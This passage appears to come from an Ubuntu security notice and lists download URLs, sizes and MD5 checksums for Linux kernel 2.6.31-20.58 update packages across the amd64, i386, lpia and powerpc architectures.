http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    50076 fe9438cbcf59ac1d1b1d5365439e7e65
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    92532 3ed5a38671b360e450c45b5ca5d82ee5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    37780 10299612add8025a896a2f72ec482798
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   537672 aaea4b446dba8c648fb65280c5747744
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   130672 564ea485b669f52e01a28e8bfd3077ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    53836 656705921e7c5ecbc184811b27091d99
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   310120 df2680580c976ea667017d3323dd1c4d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:  4358002 032c5a17e6d9ed8175016f4694469047
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-generic_2.6.31-20.58_amd64.deb
  Size/MD5:   705678 0e08b7ba77695ab12a62ce51c53c109f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-server_2.6.31-20.58_amd64.deb
  Size/MD5:   705692 a0284e279b9295ffd3fd332f8c5b7b90
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-generic_2.6.31-20.58_amd64.deb
  Size/MD5: 28943014 62622c3963d0609f5e6e75da7b0815e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-server_2.6.31-20.58_amd64.deb
  Size/MD5: 28927152 d0a0459ba5d61e4cd417df8cea2839f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-virtual_2.6.31-20.58_amd64.deb
  Size/MD5: 11758096 e0f0116714615ccc3a45b9264e7ae7df
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_amd64.deb
  Size/MD5:   750900 92e0faec1aec9665ce29b5a03bc4c081
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   168328 18687fd4e595c9af5df9fc35c2b2c518
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   202822 36c27a4070e79b5df8cecc7d9e8716c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    27272 8e8d278f596814c7e85bd298300b8afc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   311784 672ba00729b573715fcf26d1255e23de
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:  2281866 9c74fd94f34894eb1522f1b7045cd7c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   158668 80a090db5e7c23f8c1afc043709d11d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   203104 78ab65be5039febd31bc4cc076006ef8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   161078 22b4849990ba0e78042ac54541b737e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    38058 5b0dcbe7a58a36e5c8e1dbc3aef5bf2a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:     5760 681bb2e661736ad96b96955243249b8e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    73754 4a0b69044bf9833cb0626b22cfdfc3c7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    22254 f5386ea889491e31742064ff935fd6d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:     9546 9808c305081559c33e3d3a89e9ba5d42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    39840 ee84a0c45e323ed2ef5bbddd0c240fe6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    23488 e5ddd285190726239473e769b9878a9f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:  1389892 f7dda1ecf1454c252f6fd1a22ea6e685
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    47374 e34e6784362b33d76d2d4b9f8cd4bd39
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    51768 ae84bf131e8fd4b11de8d56226e2523d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   128950 e7a5b9992b8d56b74df4149b1d05fd3c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    15818 b4afab0bdffeed60838883ba62e6066e

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-305-ec2_2.6.31-305.13_i386.deb
  Size/MD5:   582086 cb7103f59ecbe0dc75e98601a4c0b857
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-305-ec2_2.6.31-305.13_i386.deb
  Size/MD5: 18093924 4fcb203070eb6e763db461b31b511647
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   198842 561707c22b421f12db802634fa86ec9b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    32454 45c00927e6a03d992744f8ac02aa0306
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    49946 d33ba1957c29206bfb679b0bf5082503
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    42114 3e44960aed5c448f9f20b991c38092dc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    45952 7298cdb31907bad7ded10be8cb7982ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    87402 6977db4b4114ec1305f9f7bce4156b46
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    33760 09902fef35eefce504b05c8be8c962f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   534180 6707f8ddb7878d95f5926c02bd78429b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   128182 babc248d4b5cf798b57fd1748810a7b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    49744 6971b858c415c7675fa1819bfa4ba9b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   295740 7b51f82d9cc20815f797d19506744fe9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:  4194312 f636a76779d4e290a5c0468bfbad04f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-386_2.6.31-20.58_i386.deb
  Size/MD5:   683228 ec8278d4fa8ad4c0fc6fcb364a630ff6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-generic-pae_2.6.31-20.58_i386.deb
  Size/MD5:   683102 24fcc52654096b221b63853997baae4b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-generic_2.6.31-20.58_i386.deb
  Size/MD5:   683258 6ef673ac513a9fa35e9f29b19d904abf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-386_2.6.31-20.58_i386.deb
  Size/MD5: 28811012 a3a8220dd02dc09344a80bd264bdfdbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-generic-pae_2.6.31-20.58_i386.deb
  Size/MD5: 28960774 b3bd2524cb864477810e365bd5c6663b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-generic_2.6.31-20.58_i386.deb
  Size/MD5: 28880888 9c66246e653c349067d7270392eb2568
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-virtual_2.6.31-20.58_i386.deb
  Size/MD5: 11212724 fa51426c0a4db11d89c25be4913bc2cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_i386.deb
  Size/MD5:   750866 ab3b0f2871d8969fca839afc31062102
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   172872 a8966308b80b55fb305ccc1e51667352
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   186156 56c280240175e5a72523c2bd2cd6cbf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    28374 4eda4b1a9590843c5a0d556b27d34223
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   292858 f107aa4800660884111ea7c39aaf9419
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:  2400144 a914e510233245cdecc4b5f77a76cd17
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   142002 0d8f962212f59d469cdcf69d730328d2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   189586 05567c3f78cb3b5a5628c20d4def6bd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   148520 573d3cfa067b88bd90d56f69d1682dfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    35304 8f18f18e5a8ffc1e3c16f1d4c5e1d9d8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:     6848 54f3defcaa0dd0210c55899b86f85ba0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    86056 cbf61386af6d9ff47dd05cc81a0fc3f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    46426 6ed59fbbae6ed3cffc99d9ceba80e7e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:     8918 498d386c2cebbc12b692e0d6faceadbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    36284 e69ff47ad64d5ef819013d9fe3a8dcdb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    21666 b9f565853aab6fc46bc21a2de0b2efb6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:  1495312 e7f74aa6ccfef64856c690d5dce9abf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    44080 7e7ccb5c93056f73cf86b3f7e456280a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    48552 5b90bbea6168164ec28a7be85babd9f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:   117816 0c65bbcfa932c88d2c273f57576a1f60
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb
  Size/MD5:    14532 13c86e9feca3c0b9aa25fa2ed12255be

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   198818 f492a89bfa133a816f5433b30d3f7126
http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    32450 c49b64363f35bf007621ebce919f45da
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    49926 42aa3c895b556b7664a9bace4e5c07ce
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    42156 52a740685ed3fe88458e4869e1a1436c
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    45948 63f114893966030fb2dd21fb1ff86e57
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    87384 ed5770c1e95984aed677bade283e574b
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    33754 a1acff2d5ffc0d8e572338b59e1d2267
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   534380 e07265b8c2eb60074d61ec0f8f866564
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   128214 4d6b45a7d7399608315d622c29c4fbfb
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    49742 a1727d6371570e668ce8d049ded41fc5
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   295736 e1c923c22ea354ebe1cafd9e47487039
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:  4194402 9e1c101a413801d7210fc79c9747656f
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-lpia_2.6.31-20.58_lpia.deb
  Size/MD5:   682746 1707bc343357d941df2a1e1c57d2a8df
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-lpia_2.6.31-20.58_lpia.deb
  Size/MD5: 28871454 0d1213617a360a07b7a53abe3c0760de
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_lpia.deb
  Size/MD5:   750880 814629a187330c6e6bf7dadb006965d4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   172924 1376cb1967806e5199a751f525666c99
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   186134 fb41e2b9203fe7d14d6e98e5e7c68562
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    28366 9f7501b4e17447a38239fbb6b112cbc9
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   292822 b4c34aeb5b831238afcb0b8457cf5d4c
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:  2400378 28c26c3677528c63b3e4f634064c7adf
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   141980 0d35996bf4010bd4371dab775948fba7
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   189580 a4bb4c790773fb91475e981f2663cd1f
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   148518 1a4fa321f231db6a4e3404a2a38e0cbc
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    35298 aeb5bc12bc66e590ef7072ebae5a3973
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:     6834 a2a195736ce70dcde1f281485c080bb8
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    86044 d64c249d1b6e1b1eca7801624bb15de8
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    46420 9db6c9d9a0d710e662df3dca2a216bff
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:     8902 1e94fe84a6e0bc4cba06437c252ec011
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    36274 b5bcb24682ff547578f211bb4aa01652
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    21664 4e3797e267c5987c8e46cb0912a04e5b
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:  1495042 68f5e110d24e1495877583f6a3b6597d
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    44074 fb9b87be10f0610dfd6b879aea95e870
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    48536 5f365044da26f73038391d1209f60b53
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:   117794 f58f19685f85dc3550a10bdaeb2d9b87
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb
  Size/MD5:    14524 29c194a80a8fa54dfb397b8be6af72a2

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   321490 558de8d97cc0767381e0093e8294583c
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   263640 d52c67fff679c5b973dd4d97fc3e28f0
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    58846 b5cf5f0bd3cf351dd95bc7f6eb58e9d7
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    67044 3fb356582880d2f86b02ce922c5f5fb9
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    45920 f0773734ad9d4fd2337f5469ff4a0e5a
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    51302 70a0d50b29b644541b193f9e9c857a3c
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    90708 a768fe740c47efd3d642910277753b47
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   105156 35fac78125d8f94a33d7b6084be2f673
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    39492 5f4ccebd0c81fd5142c3938dee610caf
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    39270 5601042a79855cbff2c505f7ed8417a5
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   581076 ce7fa0ad8c3053b00f2343ef41fd4bbf
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   626394 e7e6bd8ff719c3862410795d1f1901b6
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   149292 5675ca288225e5213df9e460b64f8515
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   147336 cfb8fd9ece7e3251894da45a82c11605
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    79772 3ee6beba647c74a5dc1d3c7941153057
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    84140 b95ef8cd32392ff7466a7b15e8379cf2
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   402960 6e2f9e71205fd3353f128e355ff41925
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   342502 4e4b87ef9f0214b45404a83017940d23
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:  3824940 c1cc7ac46a8ddc565504345a061015cb
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:  5201026 48eebdc9c84f189419e48b5d101d1145
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-powerpc-smp_2.6.31-20.58_powerpc.deb
  Size/MD5:   791908 cefb0e9e85e758d6c6b546859fcd58a9
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-powerpc64-smp_2.6.31-20.58_powerpc.deb
  Size/MD5:   810434 1a8f7a142452d972b2e961dfb4997c04
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-powerpc_2.6.31-20.58_powerpc.deb
  Size/MD5:   792076 874860d391556e090a66ea7f0dcdb4b4
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-powerpc-smp_2.6.31-20.58_powerpc.deb
  Size/MD5: 24846578 9d769f07fbbeb74cee3866248036fb05
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-powerpc64-smp_2.6.31-20.58_powerpc.deb
  Size/MD5: 25857670 2c1b3792233f39f9160ceb5ba6930c34
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-powerpc_2.6.31-20.58_powerpc.deb
  Size/MD5: 24691624 f78d8b4e20f6c11f0f6053c561044c8f
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_powerpc.deb
  Size/MD5:   735966 f3057a34c1a498913951d49a13cb806c
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   272198 0680e125e6de2bc35a0dab39c7805cc2
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   294756 c1d6f23df7b887740c399a756c4efc4e
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   210578 1e98e81382f4129f30a6bbf0e8bb7623
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   216994 05ae0a83f330ccf2a6e7d358a1f23ab2
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    25802 8c93c54e67028837b302ef7cc099ef06
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:    28982 abd3ff105aa3b19518f321c0f3b9fed4
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   315042 206c7818fe5d233c9df0c37b32629502
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   357552 d2e17cb2aeadb7990ab03f9bb9d6171e
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:  2027740 309673629ecf011212bec5d4cacc7b3a
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:  2247556 8dd2fc751b12bc88d53d5275cbf0722d
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   213560 b7a270d6791f07d5c7911d95209ea072
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   209794 4a33fbd3ba03bd8f400bd71dd8ebf201
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb
  Size/MD5:   210290 91cb97d1010a7a1bf65a7656c555f896
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb
